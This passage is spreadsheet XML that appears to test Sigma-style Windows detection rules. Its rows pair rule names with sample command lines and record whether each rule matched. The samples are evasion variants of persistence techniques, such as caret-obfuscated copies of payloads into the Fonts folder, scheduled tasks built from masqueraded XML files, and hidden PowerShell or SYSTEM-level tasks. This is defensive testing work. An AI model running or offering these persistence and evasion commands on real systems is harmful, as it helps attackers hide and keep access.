        <v>0</v>
      </c>
      <c r="I321" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J321" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C322" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D322" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E322" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -create -tn "SuspiciousTask2" -xml "C:\public\payload.bin" -f   # ignored_comment.xml</t>
        </is>
      </c>
      <c r="F322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I322" s="43" t="n"/>
      <c r="J322" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K322" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B323" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C323" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D323" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E323" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F323" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J323" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K323" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B324" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C324" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D324" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E324" s="43" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G324" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J324" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K324" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B325" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C325" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D325" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E325" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I325" s="43" t="n"/>
      <c r="J325" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K325" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="326" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C326" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D326" s="43" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E326" s="43" t="n"/>
      <c r="F326" s="43" t="n"/>
      <c r="G326" s="43" t="n"/>
      <c r="H326" s="43" t="n"/>
      <c r="I326" s="43" t="n"/>
      <c r="J326" s="43" t="n"/>
      <c r="K326" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="36" t="n"/>
      <c r="B327" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C327" s="36" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D327" s="36" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E327" s="43" t="n"/>
      <c r="F327" s="43" t="n"/>
      <c r="G327" s="43" t="n"/>
      <c r="H327" s="43" t="n"/>
      <c r="I327" s="43" t="n"/>
      <c r="J327" s="43" t="n"/>
      <c r="K327" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43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</row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B329" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C329" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D329" s="36" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E329" s="36" t="n"/>
      <c r="F329" s="36" t="n"/>
      <c r="G329" s="36" t="n"/>
      <c r="H329" s="36" t="n"/>
      <c r="I329" s="36" t="n"/>
      <c r="J329" s="36" t="n"/>
      <c r="K329" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="n"/>
      <c r="B330" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C330" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D330" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E330" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J330" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K330" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="n"/>
      <c r="B331" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C331" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D331" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E331" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I331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331" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K331" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="n"/>
      <c r="B332" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C332" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D332" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E332" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe -"tn" "MyScheduledTask.xml" /xMl C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I332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332" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="n"/>
      <c r="B333" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C333" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D333" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E333" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J333" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K333" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="n"/>
      <c r="B334" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C334" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D334" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E334" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I334" s="36" t="n"/>
      <c r="J334" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K334" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="n"/>
      <c r="B335" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C335" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D335" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E335" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /XmL "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J335" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K335" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="n"/>
      <c r="B336" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C336" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D336" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E336" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I336" s="36" t="n"/>
      <c r="J336" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K336" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="n"/>
      <c r="B337" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C337" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D337" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E337" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F337" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G337" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J337" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K337" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C338" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D338" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E338" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I338" s="36" t="n"/>
      <c r="J338" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="339" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C339" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D339" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E339" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J339" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C340" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D340" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E340" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /TR "dummy.xml"</t>
        </is>
      </c>
      <c r="F340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J340" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K340" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="n"/>
      <c r="B341" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C341" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D341" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E341" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I341" s="43" t="n"/>
      <c r="J341" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K341" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="342" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="n"/>
      <c r="B342" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C342" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D342" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E342" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaNd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I342" s="43" t="n"/>
      <c r="J342" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K342" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="343" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="n"/>
      <c r="B343" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C343" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D343" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E343" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I343" s="36" t="n"/>
      <c r="J343" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K343" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="344" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="n"/>
      <c r="B344" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C344" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D344" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E344" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I344" s="36" t="n"/>
      <c r="J344" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K344" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="345" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C345" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D345" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E345" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I345" s="36" t="n"/>
      <c r="J345" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K345" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="346" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C346" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D346" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E346" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I346" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J346" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K346" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="347" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="n"/>
      <c r="B347" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C347" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D347" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E347" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I347" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J347" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K347" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="348" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="n"/>
      <c r="B348" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C348" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D348" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E348" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I348" s="43" t="n"/>
      <c r="J348" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K348" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="349" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="n"/>
      <c r="B349" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C349" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
